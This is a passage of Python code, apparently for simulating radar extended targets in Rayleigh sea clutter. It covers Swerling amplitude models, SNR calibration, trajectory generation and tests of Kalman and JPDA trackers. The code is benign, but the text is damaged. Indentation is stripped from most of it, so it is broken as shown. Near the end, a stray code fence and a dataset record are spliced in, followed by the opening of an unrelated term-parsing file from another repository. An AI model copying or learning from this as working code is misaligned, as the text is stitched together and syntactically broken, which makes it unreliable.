kcoef = kcoef_peak
if swerling_type == 0: # swerling type 0 target
kcoef_t = kcoef
template = kgauss * kcoef_t
if swerling_type == 1:
ray_scale = kcoef/np.sqrt(2)#choosing mode # /np.sqrt(2)
# central amplitude obeys the rayleigh distribution, which 2*sigma^2 = sigma_t = kcoef**2 (swerling_0's Amplitude)
kcoefs = rayleigh.rvs(loc=0, scale=ray_scale, size=1000)
kcoef_t = np.mean(kcoefs)
template = kgauss * kcoef_t
if swerling_type == 3: # central amplitude obeys the chi distribution, which degrees of freedom k=4.
df = 4
chi2_scale= kcoef/np.sqrt(df*2+df**2)#np.sqrt(df-2)#
kcoefs = chi2.rvs(df=df, scale=chi2_scale, size=1000)# or kcoef_t = chi2.rvs(df=kcoef, size=1), then template=kgauss*kcoef
kcoef_t = np.mean(kcoefs)
template = kgauss * (kcoef_t) #
# Get the decrease coefficient to make sure the inner Gaussian template satisfies the SNR requirement.
tcx, tcy = w_t / 2, h_t / 2
snr_lis = list(range(12, -3, -1)) # [12, 11, ..., -1, -2]
# shrink rate, take from cfar results.
snr_lis = [12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0, -1, -2]
wr_lis = [1.62, 1.67, 1.65, 1.76, 1.80, 2.00, 2.20, 2.30, 3.20, 3.50, 3.70, 3.90, 4.00, 4.2, 4.5]
hr_lis = [0.88, 0.89, 0.90, 0.92, 1.00, 1.10, 1.20, 1.20, 1.55, 1.55, 1.65, 1.70, 1.75, 2.0, 2.5]
incs_sw1= np.linspace(1.00, 2.55, 15)#[0.95, 1.00, 0.90, 0.85, 0.80, 1.10, 1.10, 1.10, 1.10, 1.10, 1.10, 2.00, 2.00, 2.20, 2.50]
#incs_sw1 = np.log2(1+incs_sw1)
decs = np.linspace(0.78, 0.34, 15)
#decs_sw1= np.linspace(1.00, 0.45, 15)
decs_sw3= np.linspace(1.20, 0.30, 15)
# decrease the size of Gaussian template, similar to the cfar_seg results.
# [cfar shrink the real target, when outside is lower than center]
wr = wr_lis[snr_lis.index(snr)]
hr = hr_lis[snr_lis.index(snr)]
iw, ih = w_t / wr, min(h_t / hr, h_t)
ix, iy, iw, ih = np.int64([tcx - iw / 2, tcy - ih / 2, iw, ih])
inner_gauss = template[iy:iy + ih, ix:ix + iw]
#dec_coef = np.sqrt(np.power(10, (snr / 10)) * erc_local / np.mean(inner_gauss ** 2))
#dec_str[snr_lis.index(snr)] = '%.2f' % dec_coef
if swerling_type == 0: # decreasing for non-fluctuating target type
dec_coef = decs[snr_lis.index(snr)]
template = template * 1#dec_coef # np.sqrt(1.618) #/2.8 # Make sure that in shrinked (cfar-segmented) target region still holds low snr.
if swerling_type == 1:
inc_coef = incs_sw1[snr_lis.index(snr)]
template = template * 1 #inc_coef
if swerling_type == 3:
dec_coef = decs_sw3[snr_lis.index(snr)]
template = template * 1#dec_coef
loc_snr = 10 * np.log10(np.sum(template ** 2) / np.sum(bk_roi ** 2))
glob_snr = 10 * np.log10(np.sum(template ** 2) / (erc * template.size))
peak_snr = 10 * np.log10(np.max(template)**2 / erc) #point's snr
# print('Swerling Type %d, kcoef_t %.2f (w %d, h %d), extened_egk %.2E' % (swerling_type, kcoef_t, w, h, Egk_numer))
# print('average (target - local clutter) power is (%.2f - %.2f)' % (np.sum(template ** 2) / template.size, erc_local))
# print('Asked snr is %d, simulated local snr is %.2f, simulated global snr is %.2f' % (snr, loc_snr, glob_snr))
local_snrs.append(loc_snr)
global_snrs.append(peak_snr)
mask = (template > bk_roi) * template
clutter_background[ly:ly + h_t, lx:lx + w_t] = mask + bk_roi
#clutter_background[ly:ly + h_t, lx:lx + w_t] = template + bk_roi
#Real_SNR is normally higher than peak_snr
real_snr = 10 * np.log10(max(np.max(template + bk_roi)-np.sqrt(2), np.spacing(1)) / 2)
return clutter_background
def add_uniform_template_on_clutter(cx, cy, w, h, theta, erc, snr, clutter_background, swerling_type=0):
# Erc: average clutter energy.
# Erc = np.sum(clutter_background ** 2) / clutter_background.size
# Clutter_background is a clutter background template.
kuniform = np.ones((int(h),int(w)))/(h*w)
unk_numer = np.sum(kuniform.ravel() ** 2) / kuniform.size # 2d gaussian's average power.
h_t, w_t = kuniform.shape
ly = int(cy - (h_t - 1) / 2)
ry = int(cy + (h_t - 1) / 2)
lx = int(cx - (w_t - 1) / 2)
rx = int(cx + (w_t - 1) / 2)
img_h, img_w = clutter_background.shape
if ly < 0 or lx < 0 or ry > img_h or rx > img_w:
raise ValueError('template location is beyond the image boundaries!')
bk_roi = clutter_background[ly:ly + h_t, lx:lx + w_t]
kcoef_global = np.sqrt(np.power(10, (snr / 10)) * erc / unk_numer)
erc_local = np.sum(bk_roi**2)/bk_roi.size
kcoef_local = np.sqrt(np.power(10, (snr / 10)) * erc_local / unk_numer)
kcoef = kcoef_global
if swerling_type == 0: #swerling type 0 target
kcoef_t = kcoef
template = kuniform * kcoef_t
if swerling_type == 1: #central amplitude obeys the rayleigh distribution, which 2*sigma^2 = sigma_t = kcoef (swerling_0's Amplitude)
sigma = kcoef#/np.sqrt(2)
kcoef_t = rayleigh.rvs(loc=0, scale=sigma, size=1)
template = kuniform * kcoef_t
if swerling_type == 3: #central amplitude obeys the chi distribution, which degrees of freedom k=4.
kcoef_t = chi2.rvs(df=kcoef, size=1) # or kcoef_t = chi2.rvs(df=kcoef, size=1), then template=kgauss*kcoef
template = kuniform*(kcoef_t) # for chi2, Mean=df.
loc_snr = 10*np.log10(np.sum(template**2)/np.sum(bk_roi**2))
glob_snr = 10*np.log10(np.sum(template ** 2)/(erc * template.size))
# print('Swerling Type %d, kcoef_t %.2f (w %d, h %d), extened_unk %.2E' % (swerling_type, kcoef_t, w, h, unk_numer))
# print('average (target - local clutter) power is (%.2f - %.2f)' % (np.sum(template ** 2) / template.size, erc_local))
# print('Asked snr is %d, simulated local snr is %.2f, simulated global snr is %.2f' % (snr, loc_snr, glob_snr))
local_snrs.append(loc_snr)
global_snrs.append(glob_snr)
#mask = ([template > bk_roi]) * template
#clutter_background[ly:ly + h_t, lx:lx + w_t] = mask + bk_roi
clutter_background[ly:ly + h_t, lx:lx + w_t] = template + bk_roi
return clutter_background
def get_frame(img_w, img_h, frame_no, snr, gt_dict, swerling_type=0):
'''
Get one frame combining targets and clutter.
#add swerling type on Mar 2, 2021.
:param frame_no:
:return:
'''
frame_no_key = '%02d' % frame_no
ray_background = rayleigh.rvs(loc=0, scale=1, size=(img_h, img_w)) #sigma_n=E(n^2) = 2*scale^2
# Erc: average clutter energy.
erc = np.sum(ray_background ** 2) / ray_background.size
#add targets on the simulated position in each frame
simulated_frame = ray_background
# Each frame gets multiple targets.
gt_targets = gt_dict[frame_no_key]
for tid in gt_targets:
#Note that here x, y in gt is the top-left position.
x, y, w, h, theta = gt_targets[tid]
cx = x + w/2
cy = y + h/2
simulated_frame = add_gaussian_template_on_clutter_v2(cx, cy, w, h, theta, erc, snr,
simulated_frame,swerling_type)
# if tid == 'amelia':#uniform distributed target.
# simulated_frame = add_uniform_template_on_clutter(cx, cy, w, h, theta, erc, snr, simulated_frame, swerling_type)
# else:#Gaussian distributed target.
# simulated_frame = add_gaussian_template_on_clutter(cx, cy, w, h, theta, erc, snr, simulated_frame, swerling_type)
#simulated_frame = uti.frame_normalize(simulated_frame)
fids = list(gt_dict.keys())
fids.sort()
if(int(frame_no)==int(fids[-1])):
print('Averaged (extended region -- peak point) SNR is (%.2f - %.2f)' % (np.mean(local_snrs), np.mean(global_snrs)))
return simulated_frame
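# --- Usage sketch (not part of the original file): one simulated frame with a
# --- single hand-made extended target; the ground-truth entry is an assumption
# --- in the same [top-left x, top-left y, w, h, theta] format used above. ---
def _demo_get_frame():
    gt = {'00': {'t1': [100.0, 100.0, 28, 20, 0.0]}}
    frame = get_frame(img_w=256, img_h=256, frame_no=0, snr=10, gt_dict=gt)
    plt.imshow(frame)
    plt.show()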
def manuver_in_clutter(snr=10):
'''
Simulate a single maneuvering target in clutter at a given SNR.
:return:
'''
img_w = 256
img_h = 256
rayscale = 1
rayclutter = rayleigh.rvs(loc=0, scale=rayscale, size=(img_h, img_w)) # samples generation
Erc = np.sum(rayclutter ** 2) / rayclutter.size
xs,ys,ws,hs,thetas = s_manuver()
for i, elem in enumerate(zip(xs,ys,ws,hs,thetas)):
rayclutter = rayleigh.rvs(loc=0, scale=rayscale, size=(img_h, img_w))
x, y, w, h, theta = elem
et_clutter_frame = add_gaussian_template_on_clutter(x, y, w, h, theta, Erc, snr, rayclutter)
plt.imshow(et_clutter_frame)
plt.pause(0.1)
def multiple_extended_targets_in_clutter():
'''
Simulate three extended targets moving with CV, CA and CT motion models.
:return: per-frame ground-truth dict: frame id -> {target id: [top-left x, top-left y, w, h, theta]}
'''
x0 = 20+20
y0 = 30+20
velo = (1.5, 1.2)
#velo = (3.75, 2.7)
npoints = 51
xs_cv, ys_cv = constant_velocity(x0, y0, velo, npoints)
w_cv = 20+8
h_cv = 16+4
ws_cv = np.ones(npoints)*w_cv #
#ws_cv = np.random.normal(w_cv, 0.5, npoints)
hs_cv = np.ones(npoints)*h_cv #
#hs_cv = np.random.normal(h_cv, 0.5, npoints)
theta_cv = get_orientation(xs_cv, ys_cv)
recttl_xs_cv = xs_cv - ws_cv/2
recttl_ys_cv = ys_cv - hs_cv/2
x0 = 160+20
y0 = 30+20
# velo = (-6, -2)
# acc = (0.3, 0.25)
velo = (-1.5, -0.5)
acc = (0.1, 0.1)
npoints = 51
w_ca = 28
h_ca = 20
# w_ca = 14 #for uniform_distribution
# h_ca = 20 #for uniform_distribution
xs_ca, ys_ca = constant_accelerate(x0, y0, velo, acc, npoints)
ws_ca = np.ones(npoints)*w_ca ##
#ws_ca = np.random.normal(w_ca, 0.5, npoints)
hs_ca = np.ones(npoints)*h_ca ##
#hs_ca = np.random.normal(h_ca, 0.5, npoints)
theta_ca = get_orientation(xs_ca, ys_ca)
recttl_xs_ca = xs_ca - ws_ca/2
recttl_ys_ca = ys_ca - hs_ca/2
#radius = 60
#omega = 0.0685
# x0 = 50 + 6
# y0 = 100+20
radius = 70
omega = 0.0685/1.5
npoints = 51
x0 = 50 + 6
y0 = 100 + 20
w_circ = 16+20
h_circ = 10+10
xs_circ, ys_circ = constant_turn(x0, y0, radius, omega, npoints)
ws_circ = np.ones(npoints)*w_circ ##
#ws_circ= np.random.normal(w_circ, 0.5, npoints)
hs_circ = np.ones(npoints)*h_circ ##
#hs_circ= np.random.normal(h_circ, 0.5, npoints)
theta_circ = get_orientation(xs_circ, ys_circ)
recttl_xs_circ = xs_circ - ws_circ/2
recttl_ys_circ = ys_circ - hs_circ/2
# radius = 50
# omega = -0.15
# npoints = 50
# x0 = 60 + 20
# y0 = 100 + 20
# w_ct = 16+10
# h_ct = 16+0
# xs_ct, ys_ct = constant_turn(x0, y0, radius, omega, npoints)
# ws_ct = np.random.normal(w_ct, 0.5, npoints)
# hs_ct = np.random.normal(h_ct, 0.5, npoints)
# theta_ct = get_orientation(xs_ct, ys_ct)
# x0 = 40
# y0 = 30+20
# velo = (0.5, 0)
# npoints = 50
# w_cvline = 22 + 16
# h_cvline = 17 + 13
# xs_cvline, ys_cvline = constant_velocity(x0, y0, velo, npoints)
# #ws_ca = np.ones(npoints)*w_ca ##
# ws_cvline = np.random.normal(w_cvline, 0.5, npoints)
# #hs_ca = np.ones(npoints)*h_ca ##
# hs_cvline = np.random.normal(h_cvline, 0.5, npoints)
# theta_cvline = get_orientation(xs_cvline, ys_cvline)
# recttl_xs_cvline = xs_cvline - ws_cvline/2
# recttl_ys_cvline = ys_cvline - hs_cvline/2
## This part is to view the trajectory of the ideal ground-truth.
# fig,ax =plt.subplots()
# plot_ellipse(ax, xs_cv, ys_cv, ws_cv, hs_cv, facecolor='green')
# plot_ellipse(ax, xs_ca, ys_ca, ws_ca, hs_ca, facecolor='red')
# plot_ellipse(ax, xs_circ, ys_circ, ws_circ, hs_circ, facecolor='blue')
# plot_ellipse(ax, xs_ct, ys_ct, ws_ct, hs_ct, facecolor='black')
# plt.show()
Gt_dict = {}
for i in range(npoints):
Gt_dict['%02d' % i] = {}
# tid = 1, 2, 3, 4
Gt_dict['%02d' % i]['victor']=[recttl_xs_cv[i], recttl_ys_cv[i], ws_cv[i], hs_cv[i], theta_cv[i]]
Gt_dict['%02d' % i]['amelia']=[recttl_xs_ca[i], recttl_ys_ca[i], ws_ca[i], hs_ca[i], theta_ca[i]]
Gt_dict['%02d' % i]['urich' ]=[recttl_xs_circ[i],recttl_ys_circ[i],ws_circ[i], hs_circ[i], theta_circ[i]]
#Gt_dict['%02d' % i]['line' ] =[recttl_xs_cvline[i], recttl_ys_cvline[i], ws_cvline[i], hs_cvline[i], theta_cvline[i]]
#Gt_dict['%02d' % i]['dormy']=[xs_ct[i], ys_ct[i], ws_ct[i], hs_ct[i], theta_ct[i]]
# # add target on the clutter background
# # results can be viewed on a canvas(300,300).
# img_w = 300
# img_h = 300
#
# rayscale = 1 # Base uint for computing the snr.
# rayclutter = rayleigh.rvs(loc=0, scale=rayscale, size=(img_h, img_w)) # samples generation
# Erc = np.sum(rayclutter ** 2) / rayclutter.size
#
# snr = 10
# frame_nums = len(Gt_dict)
# for key in Gt_dict:
# print('frame %s' % key)
# gt_targets = Gt_dict[key]
# for tid in gt_targets:
# x, y, w, h, theta = gt_targets[tid]
# et_clutter_frame = add_gaussian_template_on_clutter(x, y, w, h, theta, snr, rayclutter)
# plt.imshow(et_clutter_frame)
# plt.pause(0.1)
return Gt_dict
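# --- Usage sketch (not part of the original file): render the full simulated
# --- sequence from the ground truth above; canvas size and SNR are assumptions. ---
def _demo_simulated_sequence(snr=5, swerling_type=0):
    gt_dict = multiple_extended_targets_in_clutter()
    for fid in sorted(gt_dict.keys()):
        frame = get_frame(300, 300, int(fid), snr, gt_dict, swerling_type)
        plt.imshow(frame)
        plt.pause(0.05)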
def mtt_sim():
'''
simulate 4 targets in a roi to test the JPDA algorithm.
:return:
'''
x0 = 10
y0 = 20
velo = (1.5, 1.7)
npoints = 50
x1s, y1s = constant_velocity(x0, y0, velo, npoints)
x0 = 10
y0 = 80
velo = (1.5, -2)
npoints = 50
x2s, y2s = constant_velocity(x0, y0, velo, npoints)
radius = 60
omega = 0.0685
npoints =50
x0 = 30
y0 = 50
x3s,y3s = constant_turn(x0, y0, radius, omega, npoints)
radius = 50
omega = -0.15
npoints =50
x0 = 60
y0 = 100
x4s,y4s = constant_turn(x0, y0, radius, omega, npoints)
plt.axis([0, 200, 0, 200])
plt.plot(x1s, y1s, '.', color='red')
plt.plot(x2s, y2s, '.', color='green')
plt.plot(x3s, y3s, '.', color='blue')
plt.plot(x4s, y4s, '.', color='yellow')
tx = [str(i) for i in range(1,51)]
# x = x1s
# y = y1s
# for i in range(50):
# plt.text(x[i], y[i], tx[i])
#plt.text(x1s, y1s, tx)
show_text(x1s, y1s, tx)
show_text(x2s, y2s, tx)
show_text(x3s, y3s, tx)
show_text(x4s, y4s, tx)
plt.show()
def plot_ellipse(ax, xs, ys, ws, hs, facecolor):
'''
Plot ellipse based on the ground truth sequential points:
:param ax: axis object
:param xs: x vector
:param ys: y vector
:param ws: width vector
:param hs: height vector
:return:
'''
dys = np.diff(ys)
dxs = np.diff(xs)
thetas_less = np.arctan2(dys, dxs) # len(dxs) - 1
thetas = np.pad(thetas_less,(0,1),'edge') # add one elements to the end
#ellipse_gate1 = []
#fig, ax = plt.subplots()
#plot_trajectory(xs, ys, color=facecolor)
for i in range(len(xs)):
#rect = Rectangle(xy=[x1s[i], y1s[i]], width=w1s[i], height=y1s[i], angle=theta1s[i])
angle_deg = thetas[i]*180/np.pi
e = Ellipse(xy=[xs[i], ys[i]], width=ws[i], height=hs[i], angle=angle_deg, alpha=0.5, color=facecolor)
#ellipse_gate1.append(e)
plt.plot(xs, ys, '.', color=facecolor, markersize=2)
ax.add_patch(e)
ax.set_aspect('equal')
ax.autoscale()
ax.text(xs[i], ys[i], str(i), fontsize=9, color=facecolor)
def multiple_extended_targets_sim():
'''
simulate 4 extended targets in a roi, pay attention to rotation.
theta = atan(dy/dx)
:return:
'''
x0 = 10
y0 = 20
#velo = (1.5, 1.7)
velo = (1.5, 2.7)
npoints = 50
x1m, y1m = constant_velocity(x0, y0, velo, npoints)
motion_noise = np.random.normal(3,0.4,2*npoints)
observation_noise = np.random.normal(2,0.5,2*npoints)
x1t = x1m + motion_noise[0:npoints]
y1t = y1m + motion_noise[npoints:2*npoints]
w1t = 4
h1t = 2
x1s = x1t + observation_noise[:npoints]
y1s = y1t + observation_noise[npoints:2*npoints]
w1s = np.random.normal(w1t, 0.5, npoints)
h1s = np.random.normal(h1t, 0.5, npoints)
x0 = 10
y0 = 80
velo = (1.5, -2)
npoints = 50
x2m, y2m = constant_velocity(x0, y0, velo, npoints)
motion_noise = np.random.normal(4,0.5,2*npoints)
observation_noise = np.random.normal(2,0.5,2*npoints)
x2t = x2m + motion_noise[0:npoints]
y2t = y2m + motion_noise[npoints:2*npoints]
w2t = 4
h2t = 3
x2s = x2t + observation_noise[:npoints]
y2s = y2t + observation_noise[npoints:2*npoints]
w2s = np.random.normal(w2t, 0.5, npoints)
h2s = np.random.normal(h2t, 0.5, npoints)
radius = 60
omega = 0.0685
npoints =50
x0 = 30
y0 = 50
x3m, y3m = constant_turn(x0, y0, radius, omega, npoints)
motion_noise = np.random.normal(3,0.5,2*npoints)
observation_noise = np.random.normal(2,0.5,2*npoints)
x3t = x3m + motion_noise[0:npoints]
y3t = y3m + motion_noise[npoints:2*npoints]
w3t = 6
h3t = 3
x3s = x3t + observation_noise[:npoints]
y3s = y3t + observation_noise[npoints:2*npoints]
w3s = np.random.normal(w3t, 0.5, npoints)
h3s = np.random.normal(h3t, 0.5, npoints)
radius = 50
omega = -0.15
npoints =50
x0 = 60
y0 = 100
x4m,y4m = constant_turn(x0, y0, radius, omega, npoints)
motion_noise = np.random.normal(3,0.5,2*npoints)
observation_noise = np.random.normal(2,0.5,2*npoints)
x4t = x4m + motion_noise[0:npoints]
y4t = y4m + motion_noise[npoints:2*npoints]
w4t = 5
h4t = 2
x4s = x4t + observation_noise[:npoints]
y4s = y4t + observation_noise[npoints:2*npoints]
w4s = np.random.normal(w4t, 0.5, npoints)
h4s = np.random.normal(h4t, 0.5, npoints)
Zs_dict = {}
Xt_dict = {}
for i in range(npoints):
Zs_dict['%d' % i] = []
Zs_dict['%d' % i].append(np.array([ [x1s[i]], [y1s[i]], [w1s[i]], [h1s[i]] ]))
Zs_dict['%d' % i].append(np.array([ [x2s[i]], [y2s[i]], [w2s[i]], [h2s[i]] ]))
Zs_dict['%d' % i].append(np.array([ [x3s[i]], [y3s[i]], [w3s[i]], [h3s[i]] ]))
Zs_dict['%d' % i].append(np.array([ [x4s[i]], [y4s[i]], [w4s[i]], [h4s[i]] ]))
Xt_dict['%d' % i] = []
Xt_dict['%d' % i].append(np.array([ [x1t[i]], [y1t[i]], [w1t], [h1t] ]))
Xt_dict['%d' % i].append(np.array([ [x2t[i]], [y2t[i]], [w2t], [h2t] ]))
Xt_dict['%d' % i].append(np.array([ [x3t[i]], [y3t[i]], [w3t], [h3t] ]))
Xt_dict['%d' % i].append(np.array([ [x4t[i]], [y4t[i]], [w4t], [h4t] ]))
# plt.axis([0, 200, 0, 200])
# plt.plot(x1s, y1s, '.', color='red')
# plt.plot(x2s, y2s, '.', color='green')
# plt.plot(x3s, y3s, '.', color='blue')
# plt.plot(x4s, y4s, '.', color='yellow')
# tx = [str(i) for i in range(1,51)]
# show_text(x1s, y1s, tx)
# show_text(x2s, y2s, tx)
# show_text(x3s, y3s, tx)
# show_text(x4s, y4s, tx)
# plt.show()
fig, ax = plt.subplots()
plot_ellipse(ax, x1s, y1s, w1s, h1s, facecolor='red')
plot_ellipse(ax, x2s, y2s, w2s, h2s, facecolor='green')
plot_ellipse(ax, x3s, y3s, w3s, h3s, facecolor='blue')
plot_ellipse(ax, x4s, y4s, w4s, h4s, facecolor='black')
plt.show()
return Zs_dict, Xt_dict
def show_text(xs, ys, tx):
num = len(xs)
for i in range(num):
plt.text(xs[i], ys[i], tx[i])
def plot_trajectory(xs, ys, color='red'):
'''
Draw the trajectory on the whiteboard.
:param xs:
:param ys:
:return:
'''
plt.plot(xs, ys, '.', color=color)
def test_kf(xs, ys, mx, my):
'''
:param xs: ground truth x
:param ys: ground truth y
:param mx: measured x
:param my: measured y
:return:
'''
tracker = kf_model.kalman_filter()
cx = xs[0]
cy = ys[0]
ok = tracker.init(cx, cy)
X_ = tracker.X0
P_ = tracker.P0
ex = [cx]
ey = [cy]
N = len(xs)-1
for i in range(1, N):
zx = mx[i]
zy = my[i]
X_, P_, Xpre = tracker.update(X_, P_, zx, zy)
ex.append(X_[0,0])
ey.append(X_[2,0])
plot_trajectory(xs, ys, 'red')
plot_trajectory(mx, my, 'yellow')
plot_trajectory(ex, ey, 'green')
def get_cov_ellipse(mean, cov):
'''
Get ellipse from a 2d Gaussian covariance.
:param mean:
:param cov:
:return:
'''
w, v = la.eig(cov)
angle_deg = np.arctan2(v[1, 0], v[0, 0])
angle_deg *= 180./np.pi
e = Ellipse(xy=mean, width=w[0], height=w[1], angle=angle_deg, alpha=0.5, color='black')
return e
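# --- Usage sketch (not part of the original file): turn a 2x2 covariance into a
# --- matplotlib Ellipse patch; the mean and covariance values are assumptions. ---
def _demo_cov_ellipse():
    mean = np.array([5.0, 3.0])
    cov = np.array([[4.0, 1.2], [1.2, 2.0]])
    ell = get_cov_ellipse(mean, cov)
    fig, ax = plt.subplots()
    ax.add_patch(ell)
    ax.set_xlim(0, 10)
    ax.set_ylim(0, 6)
    plt.show()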
def test_ettkf(xs, ys, mx, my, mw, mh):
'''
:param xs: ground truth x
:param ys: ground truth y
:param mx: measured x
:param my: measured y
:return:
'''
tracker = kf_model.ETT_KF_Filter()
cx = xs[0]
cy = ys[0]
vx = 4
vy = 4
w = 3
h = 1.5
ok = tracker.init(cx, vx, cy, vy, w, h)
X_ = tracker.X0
P_ = tracker.P0
ex = [cx]
ey = [cy]
ellipse_gate = []
ett_rects = []
zxpr = []
zypr = []
N = len(xs)
gamma_gate = 5
for i in range(1, N):
zx = mx[i]
zy = my[i]
zw = mw[i]
zh = mh[i]
X_, P_, X_pr, Z_pr, S, S_inv = tracker.update(X_, P_, zx, zy, zw, zh)
ex.append(X_[0,0])
ey.append(X_[2,0])
zxpr.append(Z_pr[0,0])
zypr.append(Z_pr[1,0])
# Only get the x,y mean and cov for ellipse fitting
eli = get_cov_ellipse(Z_pr[0:2], S[0:2,0:2])
rect = Rectangle(xy=[X_[0,0]-X_[4,0]/2, X_[2,0]-X_[5,0]/2], width=zw, height=zh,angle=eli.angle)
ellipse_gate.append(eli)
ett_rects.append(rect)
fig, ax = plt.subplots()
plot_trajectory(xs, ys, 'red')
plot_trajectory(mx, my, 'yellow')
plot_trajectory(ex, ey, 'green')
plot_trajectory(zxpr, zypr, 'blue')
for eg in ellipse_gate:
ax.add_artist(eg)
for rect in ett_rects:
ax.add_artist(rect)
plt.show()
def test_jpda():
'''
Test JPDA.
:return:
'''
mtt_jpda = jpda_model.Traj_manage()
mtt_jpda.init()
Zs_dict, Xt_dict = multiple_extended_targets_sim()
nframe = 0
for key in Zs_dict:
print('frame %s' % key)
Zs = Zs_dict[key]
if nframe == 0 :
mtt_jpda.track_init(Zs)
else:
mtt_jpda.track_update(Zs)
nframe += 1
print('')
def test_distribution_average_power():
'''
Test the average power (AP, or mean squared amplitude) of random points sampled from a known distribution.
Monitoring the relationship between the sigma and the parameters of the distribution.
:return:
'''
print('Test for point samples.')
ray_sigma = 2
ray_scale = np.sqrt(ray_sigma/2)
ray_samples = rayleigh.rvs(loc=0, scale=ray_scale, size=10000)
num_ap_ray = np.mean(ray_samples**2)
sea_clutter_samples = rayleigh.rvs(loc=0, scale=ray_scale, size=10000)
target_add_sc_samples = ray_samples+sea_clutter_samples
test_snr = 10*np.log10(np.mean((target_add_sc_samples - np.sqrt(2))**2)/2)
print('Rayleigh theory average power (ap) is %.2f, numerical ap is %.2f'%(ray_sigma, num_ap_ray))
print('sw=1 target in clutter, snr %.2f'%test_snr)
chi_sigma = 2
chi_df = 2
chi_samples = chi.rvs(df=chi_df, loc=0, size=10000)
num_ap_chi = np.mean(chi_samples**2)
print('Chi theory average power (ap) is %.2f, numerical ap is %.2f'%(chi_sigma, num_ap_chi))
chi2_sigma = 2
# Reversely eq: 2*df+df^2 = sigma_t
chi2_df = np.sqrt(chi2_sigma+1)-1
#scale = np.sqrt(E(x^2)/(2*df+df^2))
chi2_samples = chi2.rvs(df=4, size=10000, scale=1/np.sqrt(12))
num_ap_chi2 = np.mean(chi2_samples**2)
print('Chi2 theory average power (ap) is %.2f, numerical ap is %.2f'%(chi2_sigma, num_ap_chi2))
print('Test for extended target samples.')
w = 28
h = 20
theta=45
sigma_x = (w / 2.5 - 0.5) / 2 #sigma_x is related to the width of the template
sigma_y = (h / 2.5 - 0.5) / 2
kgauss = gaussian_kernel2d(sigma_x, sigma_y, theta, bnorm=False) # Get diffusive coefficients for a 2d gaussian
Egk_numer = np.sum(kgauss.ravel() ** 2) / kgauss.size # 2d gaussian's average power.
h_t, w_t = kgauss.shape
snr = 0
erc = 1
# compute the amplitude coefficients according to the SNR Eq.
sigma_t = np.power(10, (snr / 10)) * erc/Egk_numer
# rayleigh_scale = np.sqrt(sigma_t / 2)
# ray_frame_samples = rayleigh.rvs(loc=0, scale=rayleigh_scale, size=10000)
# df = 4
# chi2_scale = np.sqrt(sigma_t / (2 * df + df ^ 2))
# chi2_frame_samples= chi2.rvs(df=df, scale=chi2_scale, size=10000)
# plt.hist(ray_frame_samples, color='r', alpha=0.5, bins=range(12))
# #plt.figure()
# plt.hist(chi2_frame_samples,color='y', alpha=0.5, bins=range(12))
# plt.pause(0.1)
# average power of clutter is computed by numerical results in local roi-window.
num_snr_list = []
swerling_type = 3
for i in range(1000):
if swerling_type == 0: # swerling type 0 target
a = np.sqrt(sigma_t)
template = kgauss * a
if swerling_type == 1:
rayleigh_scale = np.sqrt(sigma_t/2)
# central amplitude obeys the rayleigh distribution, which 2*sigma^2 = sigma_t = kcoef**2 (swerling_0's Amplitude)
a = rayleigh.rvs(loc=0, scale=rayleigh_scale, size=1)
#a = np.mean(a_rvs)
template = kgauss * a
if swerling_type == 3: # central amplitude obeys the chi distribution, which degrees of freedom k=4.
#df= np.sqrt(sigma_t+1)-1
df= 4
chi2_scale = np.sqrt(sigma_t/(2*df+df**2))
a = chi2.rvs(df=df, size=1, scale=chi2_scale) # or kcoef_t = chi2.rvs(df=kcoef, size=1), then template=kgauss*kcoef
#a = np.mean(a_rvs)
template = kgauss * a # for chi2, Mean=df.
num_snr = 10*np.log10(np.mean(template**2)/erc)
num_snr_list.append(num_snr)
print('swerling %d, numerical snr is %.5f'%(swerling_type, np.average(num_snr_list)))
print()
if __name__ == '__main__':
test_distribution_average_power()
#manuver_in_clutter()
# from PIL import Image
#
# data = np.random.random((2, 2))
# img1 = Image.fromarray(data)
# img1.save('test.tiff',dpi=(300,300))
# img2 = Image.open('test.tiff')
#
# f1 = np.array(img1.getdata())
# f2 = np.array(img2.getdata())
# print(f1==f2)
# print(f1)
multiple_extended_targets_in_clutter()
#using simulated targets to test jpda algorithm
#test_jpda()
#
# mean = [19.92977907, 5.07380955]
# width = 30
# height = 10.1828848
# angle = 0
# ell = Ellipse(xy=mean, width=width, height=height, angle=angle,fill=None)
# fig, ax = plt.subplots()
#
# ax.add_patch(ell)
# ax.set_aspect('equal')
# ax.autoscale()
# plt.show()
#multiple_extended_targets_sim()
xs,ys,ws,hs,thetas = s_manuver()
print('')
# mtt_sim()
# plt.show()
#plt.show()
#npts = 100
# x0 = 0
# y0 = 0
# velo=(4,4)
# xs,ys = constant_velocity(x0,y0,velo,npts)
# x0=0
# y0=200
# velo=(2,2)
# acc = 0.01
# xs,ys = constant_accelerate(x0,y0,velo,acc,npts)
# x0=50
# y0=50
# radius = 50
# omega = 0.2
# xs,ys = constant_turn(x0, y0, radius, omega, npts)
# mmean = [0,0]
# mcov = [[2, 0],
# [0,2.5]]
#
# dx, dy = np.random.multivariate_normal(mmean, mcov, npts).T
# mx = xs+dx
# my = ys+dy
# #gaussian_disturbance = norm.rvs(loc=0, scale=1, size=(1, npts))
# # plot_trajectory(xs,ys,'red')
# # plot_trajectory(mx,my,'yellow')
# #test_kf(xs,ys,mx,my)
#
# w = 3
# h = 1.5
# mw = w + dx
# mh = h + dy
# test_ettkf(xs, ys, mx, my, mw, mh)
# x0=0
# y0=200
# velo=2
# acc = 0.01
# xs,ys = constant_accelerate(x0,y0,velo,acc,npts)
# plot_trajectory(xs,ys,'blue')
#
# x0=50
# y0=50
# radius = 50
# omega = 0.2
# xs,ys = constant_turn(x0, y0, radius, omega, npts)
# plot_trajectory(xs,ys,'green')
# plt.show()
``` |
{
"source": "JoeyEremondi/agda-soas",
"score": 4
} |
#### File: agda-soas/gen/eq.py
```python
from .util import *
from .term import *
import re
from enum import Enum
class Term:
"""Top-level term in a object- and metavariable context
"""
def __init__(self, ctx, mctx):
self.ctx = ctx
self.mctx = mctx
def render(self):
"""Render a term as a string.
"""
raise Exception("Abstract method")
def apply_ren(self, ren_dict):
"""Apply a renaming to a term."""
raise Exception("Abstract method")
def apply_ren_sym(self, ren_dict):
"""Apply a symbol renaming to a term."""
raise Exception("Abstract method")
def parse_term(s, ctx, mctx, ops):
"""Parse a term consisting of operators, variables and metavariables.
Args:
s (str): Input string
ctx (list[str]): Object variable context
mctx (list[str]): Metavariable context
ops (dict[str, str]): Mapping of operator names to symbols
Returns:
Term: Parsed term
"""
s = strip_parens(s.strip())
if re.search("^\w*$",s): # If a single word, either a variable or a constant
if s in ops:
